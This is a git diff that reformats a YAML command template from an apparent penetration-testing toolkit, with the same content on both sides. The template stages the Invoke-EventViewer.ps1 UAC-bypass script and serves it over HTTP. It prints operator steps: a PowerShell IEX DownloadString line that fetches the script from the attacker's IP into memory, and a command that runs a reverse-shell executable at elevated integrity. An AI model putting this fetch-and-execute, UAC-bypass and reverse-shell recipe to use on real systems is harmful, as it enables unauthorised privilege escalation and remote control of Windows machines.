--- a/src/profi/templates/scripts/deliver-windows-Invoke-EventViewer.ps1.yaml
+++ b/src/profi/templates/scripts/deliver-windows-Invoke-EventViewer.ps1.yaml
@@ -1,19 +1,17 @@
+---
 metadata:
-  filename: deliver-windows-Invoke-EventViewer.ps1.yaml
-  tags:
-  - windows
-  - privesc
-  created: '2025-03-29'
-  author: Unknown
-content: "mkdir -p packstation/outbound; cp -n {{ tools_dir }}/uacbypass/Invoke-EventViewer.ps1\
-  \ packstation/outbound/; \\\necho '================================================================';\
-  \ \\\necho '                      -----PowerShell-----                      '; \\\
-  \necho 'Preparation 1: Transfer a revshell.exe to the target ({{ delivery_path_windows\
-  \ }}\\revshell.exe) and start the listener'; \\\necho 'Deliver & Inject to memory:\
-  \ IEX (New-Object System.Net.Webclient).DownloadString(\\'http://{{ attacker_ip\
-  \ }}:{{ delivery_outbound_port }}/Invoke-EventViewer.ps1\\')'; \\\necho 'Execute\
-  \ (It takes a few seconds to trigger the revshell): Invoke-EventViewer {{ delivery_path_windows\
-  \ }}\\revshell.exe'; \\\necho 'NOTE: You should get a new revshell with a higher\
-  \ integrity level (but still the same user)'; \\\necho '================================================================';\
-  \ \\\n python {{ templates_dir }}/helper_scripts/startEnhancedHttpServer.py -p {{\
-  \ delivery_outbound_port }} -d packstation/outbound\n"
+  filename: "deliver-windows-Invoke-EventViewer.ps1.yaml"
+  tags: ["windows", "privesc"]
+  created: "2025-03-29"
+  author: "Unknown"
+
+content: |
+  mkdir -p packstation/outbound; cp -n {{ tools_dir }}/uacbypass/Invoke-EventViewer.ps1 packstation/outbound/; \
+  echo '================================================================'; \
+  echo '                      -----PowerShell-----                      '; \
+  echo 'Preparation 1: Transfer a revshell.exe to the target ({{ delivery_path_windows }}\revshell.exe) and start the listener'; \
+  echo 'Deliver & Inject to memory: IEX (New-Object System.Net.Webclient).DownloadString(\'http://{{ attacker_ip }}:{{ delivery_outbound_port }}/Invoke-EventViewer.ps1\')'; \
+  echo 'Execute (It takes a few seconds to trigger the revshell): Invoke-EventViewer {{ delivery_path_windows }}\revshell.exe'; \
+  echo 'NOTE: You should get a new revshell with a higher integrity level (but still the same user)'; \
+  echo '================================================================'; \
+  python {{ templates_dir }}/helper_scripts/startEnhancedHttpServer.py -p {{ delivery_outbound_port }} -d packstation/outbound
